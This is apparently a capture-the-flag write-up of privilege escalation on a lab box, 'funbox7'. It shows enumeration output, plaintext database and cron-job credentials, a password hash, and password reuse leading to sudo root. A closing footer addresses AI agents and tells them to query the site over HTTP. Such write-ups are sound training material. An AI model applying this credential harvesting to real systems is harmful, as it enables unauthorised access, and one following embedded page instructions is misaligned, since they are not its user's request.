# 3 box enum www-data > privesc > root

```
www-data@funbox7:/home$ ls -la
total 28
drwxr-xr-x  7 root   root   4096 Sep 18  2020 .
drwxr-xr-x 24 root   root   4096 Sep 19  2020 ..
drwxr-xr-x  2 goat   goat   4096 Feb 16 13:25 goat
drwxr-xr-x  2 harry  harry  4096 Jan 28  2021 harry
drwxr-xr-x  2 karla  karla  4096 Feb 16 13:23 karla
drwxr-xr-x  2 oracle oracle 4096 Feb 16 13:23 oracle
drwxr-xr-x  2 sally  sally  4096 Jan 28  2021 sally

# no files in any user
# nothing in /opt
```

## PEAS

```
╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -

╣ Users with console
goat:x:1003:1003:,,,:/home/goat:/bin/bash
harry:x:1001:1001:,,,:/home/harry:/bin/bash
karla:x:1000:1000:karla:/home/karla:/bin/bash
lissy:x:1005:1005::/home/lissy:/bin/sh
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
root:x:0:0:root:/root:/bin/bash
sally:x:1002:1002:,,,:/home/sally:/bin/bash

╣ MySQL version
mysql  Ver 14.14 Distrib 5.7.31, for Linux (x86_64) using  EditLine wrapper

╣ SUID - Check easy privesc, exploits and write perms
-rwsr-xr-x 1 root root 22K Mar 27  2019 /usr/bin/pkexec

╣ SGID
-rwsr-sr-x 1 daemon daemon 51K Feb 20  2018 /usr/bin/at
```

```
# we can become oracle as we have password

www-data@funbox7:/var/www/html$ su oracle
Password:
oracle@funbox7:/var/www/html$ whoami;id
oracle
uid=1004(oracle) gid=1004(oracle) groups=1004(oracle)
```

## pspy

```
2021/08/13 18:16:01 CMD: UID=0    PID=24777  | /usr/sbin/CRON -f
2021/08/13 18:17:01 CMD: UID=0    PID=24787  | tar -cvzf /root/html.tar.gz /var/www/html/ -ulissy -pgangsta
2021/08/13 18:17:01 CMD: UID=0    PID=24784  | /bin/sh -c tar -cvzf /root/html.tar.gz /var/www/html/ -ulissy -pgangsta
```

```
www-data@funbox7:/tmp$ cat /etc/phpmyadmin/config-db.php
<?php
$dbuser='phpmyadmin';
$dbpass='tgbzhnujm!';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';
www-data@funbox7:/tmp$

http://192.168.105.132/phpmyadmin
# logged in
# nothing in pma__users

# trying password for different users
www-data@funbox7:/tmp$ su karla
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

karla@funbox7:/tmp$ sudo -l
[sudo] password for karla:
Matching Defaults entries for karla on funbox7:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User karla may run the following commands on funbox7:
    (ALL : ALL) ALL
karla@funbox7:/tmp$ sudo su
root@funbox7:/tmp# whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
funbox7
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kashz.gitbook.io/proving-grounds-writeups/pg-boxes/funboxeasyenum/3-box-enum-www-data-greater-than-privesc-greater-than-root.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.